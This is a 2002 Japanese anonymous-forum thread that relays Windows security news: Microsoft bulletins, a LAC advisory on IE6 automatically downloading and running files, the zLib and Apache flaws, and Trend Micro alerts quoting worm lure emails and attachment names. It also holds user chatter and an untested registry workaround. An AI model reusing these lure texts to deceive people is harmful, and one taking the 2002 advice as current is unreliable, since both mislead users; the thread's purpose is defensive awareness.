1 :
◆MUMUMU4w :
02/02/28 13:59 ID:KJbuUqKY Windows関連のセキュリティ関連情報、パッチリリース情報等を取り扱います。
2 :
◆MUMUMU4w :02/02/28 14:02 ID:PWv2RBno
3 :
◆MUMUMU4w :02/02/28 19:37 ID:HroRek0q
4 :
◆MUMUMU4w :02/02/28 19:49 ID:HroRek0q
これはちょっと古いやつですが、本日日本語KBが公開されたので、一応。
今回の更新内容
この問題に対する日本語版 KB を公開しました。次のリンク先をご覧下さい。
http://www.microsoft.com/JAPAN/support/kb/articles/JP318/0/89.asp ==================================================
Internet Explorer の不正な VBScript 処理により Web ページがローカル
ファイルを読み取る (MS02-009)
登録日 : 2002/2/22
更新日 : 2002/2/28
概要 :
このセキュリティ情報の対象となるユーザー :
Microsoft(R) Internet Explorer を使用しているお客様
脆弱性の影響 : 情報の漏えい
最大深刻度 : 高
推奨する対応策 : Internet Explorer を使用しているお客様は修正プログラムを
適用してください。
影響を受けるソフトウェア :
・ Microsoft Internet Explorer 5.01
・ Microsoft Internet Explorer 5.5
・ Microsoft Internet Explorer 6
修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
http://www.microsoft.com/windows/ie/downloads/critical/q318089/default.asp ダウンロード先のリストから Japanese を選択してください。
5 :
名無しさん@お腹いっぱい。 :02/02/28 19:55 ID:q1MXLVtp
一応良スレ
6 :
◆MUMUMU4w :02/03/04 19:53 ID:cG0eJ+rt
■IE5.5/6.0に任意のプログラムが実行できるセキュリティーホール。
XMLの機能でActivX切ろうが何しようがHTMLを読み込んだ時点でローカルなプログラムを
実行可能な模様。回避方法は今のところレジストリをいじってこのような警告を出すのみ。
「HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0」の1004のDWORD
値を16進数で「0x3」に変える事で警告を出すことが出来ます。副作用は不明。
ちょっとお茶目すぎるっぽいのでレジストリいじりたくないよーって人はIEの使用は控えて
パッチを待つことをお勧めします。
ソース:
http://techside.net/ 元記事(英語):
http://security.greymagic.com/adv/gm001-ie/
7 :
名無しさん@お腹いっぱい。 :02/03/04 19:59 ID:nZIxQolk
むむむ。
むむむむ。
9 :
名無しさん@お腹いっぱい。 :02/03/04 20:35 ID:G2c/4MhG
もう、パッチ当てんのめんどい。。。
10 :
名無しウイルス@お腹いっぱい。 :02/03/04 21:00 ID:cMuLVZNk
11 :
名無しさん@お腹いっぱい。 :02/03/04 21:14 ID:44NSrVDU
自動的に更新を見つけて自動にダウンロードして自動インストール するプログラムないかな?
何気に良スレ
13 :
名無しさん@お腹いっぱい。 :02/03/04 21:28 ID:wfNG7iPD
>>11 自動でウイルスをインストールしそう。。。
>>13 なら自動で更新見つけて自動でウィルススキャンして自動でインスト
する機能はないかな?
マイクロソフトからダウン・インストするんだからウィルスに引っかかる
なんて事ありえんのですか?
15 :
名無しさん@お腹いっぱい。 :02/03/04 21:44 ID:LDUHKym8
>>15 ありがとうございます。でも自分は初心者なんで何がなんだかさっぱり
です。
17 :
名無しさん@お腹いっぱい。 :02/03/04 21:51 ID:jGGvU+Hs
Windowsとセキュリティは共存できません。 Windowsをアンインストールして セキュリティをインストールしてください
>>17 セキュリティて市販ソフトの事ですか?すいません逝ってきます。
19 :
login:Penguin :02/03/04 22:25 ID:hYVRCX26
逝ってらっしゃい
20 :
pen2 :02/03/05 00:21 ID:vjHya2Lb
21 :
◆MUMUMU4w :02/03/05 13:01 ID:xgHHXFS6
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp MS02-013 に関する情報
「MS02-013: Java アプレットがブラウザ トラフィックをリダイレクトする」
に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題により、ブラウザで送受信される情報を盗聴されることがござい
ます。
対象となる製品
==============
・ Microsoft virtual machine (Microsoft VM) ビルド 3802 を含む、
それ以前のビルド全て
注意: Microsoft VM は Windows や Internet Explorer の一部として出荷さ
れているほかに、Web サイトから新しいバージョンをダウンロードすることも
できます。また、Microsoft VM は多くのアプリケーションの一部としても出
荷されています。そのため、必ず、以下の手順で、ビルド番号を確認してくだ
さい。
Microsoft VM の ビルド番号は次の手順で確認します。
1. コマンド プロンプトを起動します。
・ Windows 9x/Me
[スタート] - [ファイル名を指定して実行]を選択し、 command と入力
し[OK]をクリックします。
・ Windows NT/2000/XP
[スタート] - [ファイル名を指定して実行]を選択し、 cmd と入力し
[OK]をクリックします。
2. jview を実行します。
C:>jview
3. 実行すると、以下の結果が表示されます。
赤色の部分がビルド番号になります。
Microsoft (R) Command-line Loader for Java Version 5.00.3802
Copyright (C) Microsoft Corp 1996-2000. All rights reserved.
修正プログラム
==============
Windows 9x/Me/NT 4.0/XP 用
~~~~~~~~~~~~~~~~~~~~~~~~~~
・ Microsoft VM
http://download.microsoft.com/download/vm/Install/3805/W9XNT4MeXP/EN-US/msjavx86.exe Windows 2000 用
~~~~~~~~~~~~~~~
Windows 2000 用の修正プログラムは現在準備中です。準備ができ次第、この
ページにて、お知らせします。
22 :
◆MUMUMU4w :02/03/05 13:05 ID:xgHHXFS6
■XP HomeからProへのアップグレードでセキュリティ修正プログラムおよび
修正モジュールが移行されないとマイクロソフトが公表
マイクロソフトは3月1日より,Windows XP Home EditionをXP Professionalへアップ
グレードするためのパッケージ「Windows XP Professionalステップアップグレード」の
発売を開始している。同社はサイトで,このステップアップグレード使用時の注意点を
公表し,一部のファイルが失われるという。
注意点の1つは「スタートメニューのショートカットや,スタートアップグループのアイテム,
共有ドキュメントの中に含まれる文書,画像,音楽ファイルなどが失われる可能性がある」
(該当サイト)というもの。もう1つは,「セキュリティ修正プログラムおよび修正モジュールが
移行されない」(該当サイト)というもの。これらの回避方法については,該当サイトに手順が
示されているが,後者に関しては修正プログラムおよび修正モジュールを再度インストール
することを求めている。
ソース:
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20020305/1/
23 :
名無しさん@お腹いっぱい。 :02/03/05 13:22 ID:AyT1K1Vk
良スレ。お気に入り決定。 >>◆MUMUMU4w 頑張ってください。
24 :
名無しさん@お腹いっぱい。 :02/03/05 13:55 ID:/PsNtWjZ
>>◆MUMUMU4w 素人がでしゃばった真似をするな、 すっこんでろ。
25 :
◆MUMUMU4w :02/03/05 14:26 ID:Pswl2OOi
>>23 どうも。お役に立てば幸い。
>>24 はい。素人なので単に得た情報を掲載するだけです。
各情報の取り扱いについてはみなさんにお任せします。
26 :
名無しさん@お腹いっぱい。 :02/03/06 15:23 ID:JSGEasEm
27 :
名無しさん@お腹いっぱい。 :02/03/06 17:01 ID:2CtenHly
セキュリティなら欠かさずIEやWinの修正パッチを当てて セキュソフを入れてルーターを入れればいいよ!てか、個人 でできる事なんざそれくらいしかないだろうし。
28 :
名無しさん@お腹いっぱい。 :02/03/06 22:19 ID:Nf2ClEbB
>27 実際は何も知らないでインターネット接続している人多いと思うけどね。
29 :
名無しさん@お腹いっぱい。 :02/03/06 22:43 ID:CQ/KMIPQ
30 :
151 :02/03/06 22:48 ID:tD+oYjUs
>>28 マジでそんあに多いのですか?俺は初めてこのパソ買うときは
セキュリティ系の雑誌読みまくって準備していたけど
>>29 ならoperaでも使います?
32 :
29 :02/03/06 23:18 ID:CQ/KMIPQ
operaにしたよ 6.0は不安定だったけど、6.01になったら安定して 重宝してます。 時々、表示フォントが48ポイントになってビビるけど。
33 :
名無しさん@お腹いっぱい。 :02/03/06 23:27 ID:REwUzRQW
34 :
名無しさん@お腹いっぱい。 :02/03/06 23:41 ID:FReTYene
オペラはそこそこ使えるよ 金出してまで使う気は起きないけれど,無料版で十分使える 日本語化パッチも出てるし OSとは離れているからセキュリティーの問題もそれほどないみたい どう?
>>34 Windows UpdateやLive Updateみたいに
半自動でアップデートできるなら少しは考える
あと、ブックマークの汎用性も気になるな
age
37 :
名無しさん@お腹いっぱい。 :02/03/07 22:20 ID:cBmAGEoE
「ネット掲示板ユーザー、吉野家に殺到?」 22日、牛丼外食チェーンの最大手、吉野家ディー・アンド・シー (安部修二社長、本社=東京)の複数の店舗に、インターネット 上の掲示板“2ちゃんねる”のユーザーたちがつめかけ、ちょっと した騒動になった。“2ちゃんねる”は国内最大規模のインターネ ット掲示板で、ユーザー数は500万とも800万ともいわれる。 この掲示板で何者かが匿名で、「2002年2月22日は2ちゃん ねるの日」としたうえで「22時に最寄りの吉野家に集合」するよ う呼びかけたのが事の発端。同掲示板ユーザーの“目印”として「大 盛ねぎだく玉(ぎょく)」と注文するよう働きかけていた(「ねぎ だく」とは耳慣れない言葉だが「ねぎが多め」を意味し、「玉(ぎ ょく)」はもちろん玉子である)。同掲示板では、これに参加を表 明する者も多く、事態を重くみた吉野家は「主要店舗で通常の1.5 〜2倍量のねぎと玉子をあらかじめ仕入れて対応した」(吉野家広 報部)。午後10時過ぎには行列のできはじめる店舗もあり、東京 の新宿東口靖国通り店でも「大盛ねぎだく玉」の注文があいついだ。 その多くは男性客だったが、この時間帯には珍しく親子連れの姿も ちらほら見受けられた。店員たちが忙しく、その「特殊な」注文の 対応に追われていた。 しかしなぜ“吉野家”なのか。それは、同掲示板ユーザーのあいだ で一番の人気を誇る外食チェーンであるためと専門家は分析する。 昨年夏ごろから、吉野家の常連客を装った「怪文書」が複数の掲示 板に書き込まれるなどの出来事もあり、話題になっていた。
38 :
名無しさん@お腹いっぱい。 :02/03/07 22:51 ID:Lf0Pz569
39 :
◆MUMUMU4w :02/03/07 22:52 ID:TX//k/45
40 :
名無しさん@お腹いっぱい。 :02/03/08 03:31 ID:eLAuQfqu
>>33 のパッチのq316059.exeって前にも出てなかった?
俺のには2/14に同じ名前のファイル落してるけど同じモノ
かな?
でもサイトに3/6更新って書いてるし、更にまた修正したのかな?
つか分りにくいんだよ。このサイト
>>40 激しく同意。
問題点とパッチが複雑に絡み合ってて、結局何をどうすればいいのかが
分かりにくい。
42 :
◆MUMUMU4w :02/03/08 05:32 ID:ptGlujz6
>>40 これについては、少なくともIE6のパッチの大きさ、チェックサムともに変わってませんでした。
確かに、Microsoftはたまに「サイレントアップデート」と称して、パッチ番号が変わらないのに
パッチ自体が更新されることがあるので、要注意です。
43 :
◆MUMUMU4w :02/03/08 12:08 ID:JWPpQBHG
44 :
名無しさん@お腹いっぱい。 :02/03/08 17:07 ID:YJh406Bh
MSのセキュリティサービスから妙な文字化けメールが来たのは俺だけだろうか
47 :
名無しさん@お腹いっぱい。 :02/03/08 19:41 ID:rYv0y7qB
48 :
◆MUMUMU4w :02/03/09 01:39 ID:OoXINnKA
既にSlashdot等には情報が出ていますが、一応ここにも貼っておきます。
そもそもメールでこういうファイルは送られて来ない。
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● WORM_GIBE.A(ギベ)
マイクロソフト社のセキュリティアップデートプログラムと偽る
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
○ウイルス活動:
メールの添付ファイルで広まります。メールの内容は次のとおりです。
--------------------------------
差出人: Microsoft Corporation Security Center [
[email protected] ]
または送信者のアドレス
宛先:Microsoft Customer
または受信者のアドレス
件名: Check It Out - Microsoft Security Update
など4種類から無作為に選択
本文: Microsoft Customer,this is the latest version of security update
で始まる長文。内容はセキュリティホールの説明と添付ファイルの使用方法。
添付ファイル名: q216309.exe
--------------------------------
※マイクロソフト社のセキュリティアップデートプログラムを装っています。
添付ファイルを実行すると以下のメッセージを表示し、ワーム活動とハッキ
ングツール活動を行います。
--------------------------------
This will install Security Update.
Do you wish to continue ?
[yes] [no]
--------------------------------
※yes、noのどちらを選択してもプログラムは続行されます。
<ワーム活動>
コンピュータ内に保存されているメールアドレス宛てに、上記のメールを送
信します。ウイルスコードにバグがあるため、表示名が設定されていたりサ
ブドメインがあるアドレスには送信しません。
<ハッキング活動>
Windowsフォルダにハッキングを行うためのプログラムを作成します。コン
ピュータ内の任意の情報を収集し、自力で通信ポートを開き外部へ情報を送
信します。
○予防対策:
不審な添付ファイルを実行しないようにしてください。マイクロソフトの修
正プログラムを装っているので十分ご注意ください。
トレンドマイクロ製品では、本ウイルスに対しウイルスパターンファイル
235以降で対応します。今後新たな亜種の発生も考えられるため、お使いの
製品のウイルスパターンファイルを最新のものに更新してください。
○「WORM_GIBE.A」を検出した場合:
1個のプログラムのため「ウイルス駆除」の処理は行えません。検出したフ
ァイルを削除してください。
すでにプログラムを実行し、システムの改変が行われた場合には、手動での
修復が必要になります。下記詳細情報の手動削除手順に従ってください。
○ WORM_GIBE.A 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GIBE.A
49 :
名無しさん@お腹いっぱい。 :02/03/09 09:00 ID:RN1yZy2S
>>47 の
w98の修正プログラムを入れるのは少し待った方が良いかも…
[ディスクのプロパテ]ィ[とファイル名を指定して実行]が文字化けします。
やっちゃったよ、俺…
訂正です ×[ディスクのプロパテ]ィ[とファイル名を指定して実行] ○[ディスクのプロパティ]と[ファイル名を指定して実行]
51 :
名無しさん@お腹いっぱい。 :02/03/09 10:43 ID:2tubuYZM
52 :
◆MUMUMU4w :02/03/12 14:46 ID:bmm5xpxS
53 :
◆MUMUMU4w :02/03/12 22:06 ID:97C86/a/
54 :
:02/03/12 22:19 ID:/KeJxdM1
ハードディスク・フォーマッター ON!!
55 :
◆MUMUMU4w :02/03/12 22:28 ID:97C86/a/
56 :
名無しさん@お腹いっぱい。 :02/03/15 21:06 ID:5nyEJEJ/
58 :
:02/03/15 22:29 ID:???
各OSごと、頻繁にサービスパック出してくれ。。 MS、サイト構成わかりにくい上に、解説文書とかが難しすぎ。。。 新しい機能盛り込む前に、やることイッパイあるだろうが。。。。。。
>58 そんなことしたら不具合だらけのサービスパックになるだろうが(藁
一つ目は、.dbxまたは.nchに変更されたファイルが 検知できない問題。 二つ目は、NullキャラクターがMIMEタイプに含まれている場合、ウイルスが検知が出来ないという問題。 三つ目は、RFCに準拠していないMIMEフォーマットの中に悪意のあるコードが含まれている場合、 ウイルスの検知動作がストップしてしまう問題。 これらにより、MIMEヘッダーのContent-Typeで、applicationとattachmentを操作されたファイルが 検知されないため、Wordなどのマクロウイルスが検知されずに実行されてしまう。ウイルスメールが検知されず、 トロイの木馬が仕込まれる。スキャン動作が停止されるため、ウイルスメールを受信してしまうなどの問題が発生する。
64 :
名無しさん@お腹いっぱい。 :02/03/16 14:21 ID:PhV8y9DA
65 :
◆MUMUMU4w :02/03/19 01:19 ID:naXTlD7l
SNS Advisory No.48
Microsoft Internet Explorer 6 Still Download And Execute ANY Program Automatically
Problem first discovered: 13 Feb 2002
Published: 18 Mar 2002
--------------------------------------------------------------------------------
概要:
Microsoft Internet Explorer 6 には、さまざまな環境下においてユーザの意思に関係なく、
ファイルを自動的にダウンロードし、かつ、それを自動的に実行してしまう問題があります。
悪意ある Web サイトの管理者はこの問題を利用することのできる悪意あるコンテンツを設置し、
ユーザが Internet Explorer 6 を利用してこのコンテンツにアクセスした場合に、この管理者が
指定した任意のプログラムはユーザのシステム上に自動的にダウンロードされ、かつ、自動的に
実行されてしまう可能性があります。
問題を確認した バージョン:
Microsoft Internet Explorer 6 + 提供済みの全ての Hotfix
問題を確認した OS:
Windows 2000 Professional + SP2 + SRP1 + 提供済みの全ての Hotfix [日本語版]
Windows NT 4.0 Workstation + SP6a + 提供済みの全ての Hotfix [日本語版]
Windows 98 + Windows 98 System Update + 提供済みの全ての Hotfix [日本語版]
回避策:
[インターネットオプション]から適切なゾーンに対して[ファイルのダウンロード]を無効にすることで
この問題を回避することができます。
発見者:
新井悠 (LAC)
[email protected] ベンダのステータス:
2月13日にこの問題を Microsoft 社に報告しましたが、それから30日を過ぎてもこの問題を
回避するための手段ないし修正プログラムは同社より提供されることはありませんでした。
我々は多くのユーザがこの問題の影響を受けてしまうことを懸念し、脆弱性の存在について
公開することを決定しました。
免責:
このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、あるがままの形で
提供されます。この情報を適用し生起される結果のリスクは利用者が負うものとし、株式会社
ラックは一切の責任を負わないものとします。
再配布について:
このアドバイザリの再配布は、下記条件を満たす限り自由です。
発行元 URL として、以下の URL を明記する。
http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html
66 :
◆MUMUMU4w :02/03/19 05:45 ID:naXTlD7l
67 :
◆AVGxGcmM :02/03/19 06:05 ID:X3Jw66b0
>>65 同じ内容でセキュ板にスレ立ててからこのスレの存在と65に書いてあるのを見つけました。
今後気を付けます。
スマソ。
68 :
◆VS.OwYC. :02/03/19 06:11 ID:xrgQC1B/
じぶんもきをつけるから ひーかんにんして
69 :
◆MUMUMU4w :02/03/20 08:19 ID:R1bHffdy
「zLib」の脆弱性はマイクロソフト製品にも影響(2002年3月19日14時30分更新)
Linuxのネットワーク関連コンポーネントとして知られている「zLib」に、ハッカーからの攻撃に
対する脆弱性の存在することが先週公表されたが、このライブラリはLinuxなどのUNIX系
ソフトウェアにとどまらず、Windowsを含めたその他のソフトウェアにも広範に利用されている
実態が、その後の調査で判明した。
脆弱性の影響を受けるソフトウェアとして、DirectX 8、FrontPage、GDI+、Internet Explorer、
Office、NetShow、Train Simulator、Visual Studio、Windows Messangerなどのマイクロソフト
製品を列挙した「zLib」の著作者は、さらにNetscape Navigator、Network Associates PGP
Security、Symantec Norton Antivirus、Jasc PaintShop Proなどの製品もその影響下にあると
説明している。
またこの「zLib」は、埋め込み型ソフトウェアでも利用されているため、各ベンダーから提供
されているソフトウェアパッチを対象のソフトウェアに適用するよう強く勧告されている。
ソース:
http://www.computernews.com/DailyNews/20020319143090E79774.htm
70 :
◆MUMUMU4w :02/03/21 13:20 ID:8ii2DaZs
Microsoft warns of another Java security hole
SAN FRANCISCO, California (Reuters) -- Microsoft Corp. has released a bulletin
advising of a second vulnerability in software that allows Windows users to run
programs written in Java, a Microsoft program manager said Tuesday.
ソース:
http://www.cnn.com/2002/TECH/internet/03/20/java.security.reut/index.html ちょっと日本語の情報探してみます。今日は休日だから出てないかも。
71 :
◆MUMUMU4w :02/03/21 13:27 ID:8ii2DaZs
>>70 ロイター(英語)の情報。
Excite翻訳によると、
> 第2の脆弱は、ユーザのコンピューター上で制限されたエリアの外で走る悪意のある
> Javaプログラムを許可するでしょう。
ということらしいです。
UPDATE 1-Microsoft warns of 2nd Java security hole in Windows
(Updates sixth paragraph to clarify that first vulnerability only affects proxy server
users, not second vulnerability)
SAN FRANCISCO, March 20 (Reuters) - Microsoft Corp. MSFT.O has released a bulletin
advising of a second vulnerability in software that allows Windows users to run programs
written in Java, a Microsoft program manager said on Tuesday.
Microsoft and Sun Microsystems Inc. SUNW.O , creator of the Java programming language,
released a joint bulletin about the first vulnerability affecting the Java Virtual Machine
code on March 4. They released a subsequent bulletin on Monday, according to Christopher
Budd, security program at the Microsoft Security Response Center.
Both vulnerabilities were rated "critical" because of the harm they could cause, however
there have been no known attempts to exploit the vulnerabilities, he said.
An update to Microsoft's Java Virtual Machine released on March 4 fixes both
vulnerabilities, Budd added.
The first vulnerability could allow a malicious Java applet on a Web site to monitor a
visitor's Web surfing until the browser window is closed. The second vulnerability would
allow a malicious Java program to run outside a restricted area on a users' computer.
For the first vulnerability, users are only at risk if they go through a proxy server to
access Web sites as is common in corporations but not homes. Proxy servers are
commonly used to cache content on frequently accessed Web sites, housing it on a
server closer to the end user so that the downloading is faster.
73 :
名無しさん@お腹いっぱい。 :02/03/22 23:36 ID:YEejVcUW
>>71 う〜ん、英語っすか?
う〜ん・・・
◆MUMUMU4wさん、ごくろうさんです
>>65 の脆弱性に関して
まだ正式発表がMSからなされていないそうですが。
情報の出所は伏せておきます。 但し個人ではないことを伝えておきます。
まだ完全に検証された情報ではないそうです。
1.この脆弱性はメディアプレーヤーがそのOSに対応した最新のものであれば回避される可能性がある
(検証作業は終わっていないそうです)
2.IE6に限定される問題なのかは未検証だそうです。
3.正式にコメントがいつできるかはその情報源の部署では分からないそうです。
この件に関しては情報源の某企業でも脆弱性の存在は認識していますが、
上記の検証が十分でない為各自ラックさんの情報等も参照しながら、
自己の責任で判断してください
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━ ● WORM_MYLIFE.B(マイライフB) ※危険度「中」 ● WORM_SHREW.A(シリュー) ※危険度「低」 ● WORM_YAHA.B(ヤハ) ※危険度「低」 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ●オーストラリア・ニュージーランド地域で流行中、危険度「中」 ○ウイルス名: WORM_MYLIFE.B(マイライフB) ○危険度:中 ○対応パターンファイル:248以降 ※1 ○ウイルス活動: メールの添付ファイルで広まります。
76 :
◆MUMUMU4w :02/03/23 10:51 ID:ZTQMxqP1
>>70 >>71 の日本語の情報出ました。Windows用の新しいパッチは出ない模様。
マイクロソフト 新たなJava脆弱性を公表(2002年3月22日13時20分更新)
全社一丸となってソフトウェアの脆弱性に関する自社製品の総点検を行っているマイクロ
ソフトは、先日発表したJVM(Java Vertual Machine)の脆弱性に続き、新たな脆弱性が
Javaに存在することを公表した。
この脆弱性は、プロキシサーバーを利用している場合に、不審なJavaプログラムが、
Windows上のJVMが管理するメモリ領域を超えて活動することを許してしまう可能性が
存在するというもの。3月4日にマイクロソフトから発表されたパッチには、これへの対処が
すでに含まれており、またこの脆弱性を突いたクラッカーからの攻撃の発生は、まだ一件も
報告されていないとしている。
ソース:
http://www.computernews.com/DailyNews/20020322132090E79774.htm
77 :
IE 6に影響を与える重大なセキュリティホール :02/03/23 13:36 ID:6D921VRq
既に各サイトで報道されているとおり,マイクロソフトのInternet Explorer(IE)6に新たなセキュリティホールが発見されている。
この問題は,悪意あるサイトを訪問すると,ユーザーの意思にかかわらず,つまりダイアログボックス表示による確認なしにファイルが
自動的にダウンロードされ,さらに自動的に実行されてしまうというもの。影響が及ぶのはIE 6のみで,それ以前のバージョンには問題はない。
だがこの問題は,現在マイクロソフトより提供されているパッチやサービスパックなどをすべて適用していても防ぐことはできないという。
この問題を発見し,アドバイザリを公開したラックでは,Windows 2000 ProfessionalやWindows NT 4.0 Workstation,Windows 98の
各プラットフォームで,現在提供されているすべてのパッチやサービスパック,セキュリティロールアップパッケージを適用した状態で,
問題が再現されたことを確認した。
http://www.zdnet.co.jp/enterprise/0203/22/02032201.html
78 :
IE 6に影響を与える重大なセキュリティホール (2) :02/03/23 13:38 ID:6D921VRq
問題の発見者であるラックの新井悠氏によると,この問題の原因は「スクリプトやActiveXとは関係ない」ところにあるという。 ただ,3月22日18時時点でもなおこの問題に対するパッチが提供されていないことから,それ以上の詳細を公開することは差し控えている。 同氏はZDNetからのメールに答え,この問題が与える影響として「ウイルスやワームの感染手段として利用される恐れが挙げられる」 としている。つまり,ユーザーは攻撃者が仕掛けたサイトにアクセスしただけで,知らず知らずのうちにウイルスやワーム, さらにはトロイの木馬に代表される悪意あるプログラムを仕掛けられる恐れがある。
79 :
名無しさん@お腹いっぱい。 :02/03/23 17:51 ID:ThTD51cQ
WindowsのJVMってMicrosoftが作ってんの? Sun?
81 :
◆MUMUMU4w :02/03/26 18:41 ID:mzcq6o+U
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● VBS_LEE.D(リー)
日本語(ローマ字)で送られてくるVBSワーム、対応パターン250以降
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●「konnichiwa」の件名で来るVBSワーム
○ウイルス名: VBS_LEE.D(リー)
○危険度:低
○対応パターンファイル:250以降 ※1
○ウイルス活動:
メールの添付ファイルとチャットシステムのIRCで広まります。メールの場
合、内容は次のとおりです。
――――――――――――――――――――
件名:konnichiwa
本文:konnichiwa kono syashin mite ne!!!!!!
添付ファイル名:syashin2.jpg.vbs
――――――――――――――――――――
※日本語(ローマ字)で、写真画像をよそおっています。うっかり添付ファ
イルを開かないようご注意ください。
添付ファイルを実行すると感染し、以下の活動を行います。
・Microsoft Outlookのアドレス帳全員に上記のメールを送信
・mIRC使用時、参加したチャットルーム内の全員にウイルスを送信
・Internet Explorerのホームページ設定をアダルトページに変更
○予防法:
このウイルスは送信するメールの件名、本文、添付ファイル名が決まってい
ます。該当のメールの添付ファイルを実行しないようにしてください。
Microsoft Outlookがインストールされていると、アドレス帳に登録されて
いる宛先すべてにメールを自動送信しますので、とくに注意が必要です。
マイクロソフトの「Windowsスクリプティングホスト」(WSH)がインストール
されている環境で動作します。必要のない場合、WSHを削除しておくという
予防法もあります。
#ご参考(Windows Scripting Host(WSH)あるいはVBSの機能を無効にする)
http://www.trendmicro.co.jp/virusinfo/basic/winsecurity/winsec1.asp <トレンドマイクロ製品をお使いの方>
トレンドマイクロ製品では、本ウイルスに対しパターンファイル250以降で
対応します。添付ファイル名が固定のため、「InterScan eManager」で該当
のメールをブロックすることも有効です。
今後新たな亜種の発生も考えられるため、お使いの製品のパターンファイル
等は最新の状態でお使いください。
○「VBS_LEE.D」を検出した場合:
特に自動起動などのシステム改変は行いませんので特別な手順は必要ありま
せん。検出したファイルはすべて削除してください。
Internet Explorerのホームページが変更されてしまった場合には手動で
Internet Explorerの設定をやり直してください。
○ VBS_LEE.D 詳細情報:
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_LEE.D
82 :
◆MUMUMU4w :02/03/28 00:33 ID:IGNQScFH
■「Apache」のWindows版に深刻なセキュリティホール -------------------------
http://www.forest.impress.co.jp/article/2002/03/27/apachebug.html フリーのWebサーバーとして広く普及している「Apache」のWindows版に任意のコマン
ドを実行される危険性のある深刻なセキュリティホールが見つかり、The Apache
Software Foundationは、この問題を修正したv1.3.24を公開した。Windows 95/98/Me/
NT 4.0/2000/XPで動作するフリーソフトで、現在The Apache Software Foundationの
サイトからダウンロードできる。
今回発見されたセキュリティホールは、「Apache」のWindows版で、CGIディレクト
リなどに拡張子“.bat”や“.cmd”のバッチファイルをおいておくと、悪意ある閲覧
者が不正なURLを使ってアクセスすることで、「Apache」が動作しているマシン上で
任意のコマンドを実行できてしまうというもの。問題の対象となるのは「Apache」の
v1.3.23以前のバージョンで、v1.3.24ではこの問題は修正されているとのこと。
また、現在ベータテストが進められている「Apache」v2.0のWindows版にも同様の
問題が見つかり、同サイトではWindows版の公開を見合わせている。この問題の発見
者によると、特に「Apache」v2.0.28以前のバージョンではインストール時に拡張子
“.bat”のファイルがCGIディレクトリに作成されるため、初期状態のまま利用して
いると攻撃を受ける可能性が高いという。「Apache」v2.0での問題は、近日公開され
る次のベータ版で修正される予定とのこと。
「Apache」は、Windows版のほかUNIX版やMacOS版などさまざまなプラットフォーム
向けのバージョンが公開されているフリーのWebサーバー。オープンソースで開発が
進められ、さまざまな機能を追加するアドオンモジュールも公開されているため、現
在もっとも広く使われているWebサーバーといわれている。
□Apache HTTPD Project - The Apache HTTP Server Project
http://httpd.apache.org/ □Windows版のダウンロード
http://www.apache.org/dist/httpd/binaries/win32/
83 :
◆MUMUMU4w :02/03/29 11:59 ID:YrHWWdpU
84 :
名無しさん@お腹いっぱい。 :02/03/29 21:25 ID:3PUvG7HV
う〜ん 新しいパッチですか・・・ もう、何がどうなってんのか分からん。 困ったもんだ。
85 :
◆MUMUMU4w :02/03/29 22:18 ID:YrHWWdpU
>>83 >>84 今日付の毎日DIGITAL Todayの記事を載せておきます。このパッチは重要なので
必ず当てておく必要があるようです。
■セキュリティーパッチ/IE用にMSが公開
マイクロソフトは28日、インターネットエクスプローラー(IE)6などのセキュリティーホール
対策用のパッチを公開した。インターネットなどを介して、悪意のあるユーザーが任意に指定
したプログラムを自動的に実行できる問題などを防ぐ。
このセキュリティーホールを利用すると、意図しないアプリケーションが実行されてハード
ディスクがフォーマットされたり、任意のファイルを読み取られたり、ウィンドウズが異常停止
する可能性があるという。
対象バージョンはIEの6、5.5SP2、5.5SP1、5.01SP2。同社のホームページで「MS02-015:
2002年3月28日Internet Explorer用の累積的な修正プログラム」の情報として掲載されて
いるが、29日現在、詳細情報は英語版のみで、日本語版は準備中。
ソース:
http://www.mainichi.co.jp/digital/internet/200203/29/07back.html
86 :
◆MUMUMU4w :02/03/29 22:19 ID:YrHWWdpU
■ 新 種 ウ イ ル ス 情 報━━━━━━━━━━━━━━━━━
● VBS_VBSWG.D(ブイビーエスダブリュジー)
日本語(ローマ字)で送られてくるVBSワーム、パターンファイル252以降
##下記のウイルスはすでに発見されているものですが、パターンファイル
250以前で対応できない亜種が見つかりました##
● VBS_LEE.D(リー)
● WORM_BYMER.A(バイマー)
亜種に対応するにはパターンファイル252以降が必要です。
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
●「konnichiwa」の件名で来るVBSワーム
○ウイルス名: VBS_VBSWG.D(ブイビーエスダブリュジー)
○危険度:低
○対応パターンファイル:252以降 ※1
○ウイルス活動:
VBS_LEE.Dとは表面上の活動に違いはありません。内部のコードが異なりま
す。
メールの添付ファイルとチャットシステムのIRCで広まります。メールの場
合、内容は次のとおりです。
――――――――――――――――――――
件名:konnichiwa
本文:konnichiwa kono syashin mite ne!!!!!!
添付ファイル名:syashin2.jpg.vbs
――――――――――――――――――――
※日本語(ローマ字)で、写真画像をよそおっています。うっかり添付ファ
イルを開かないようご注意ください。
添付ファイルを実行すると感染し、以下の活動を行います。
・Microsoft Outlookのアドレス帳全員に上記のメールを送信
・mIRC使用時、参加したチャットルーム内の全員にウイルスを送信
・Internet Explorerのホームページ設定をアダルトページに変更
○予防法:
このウイルスは送信するメールの件名、本文、添付ファイル名が決まってい
ます。該当のメールの添付ファイルを実行しないようにしてください。
Microsoft Outlookがインストールされていると、アドレス帳に登録されて
いる宛先すべてにメールを自動送信しますので、とくに注意が必要です。
マイクロソフトの「Windowsスクリプティングホスト」(WSH)がインストール
されている環境で動作します。必要のない場合、WSHを削除しておくという
予防法もあります。
#ご参考(Windows Scripting Host(WSH)あるいはVBSの機能を無効にする)
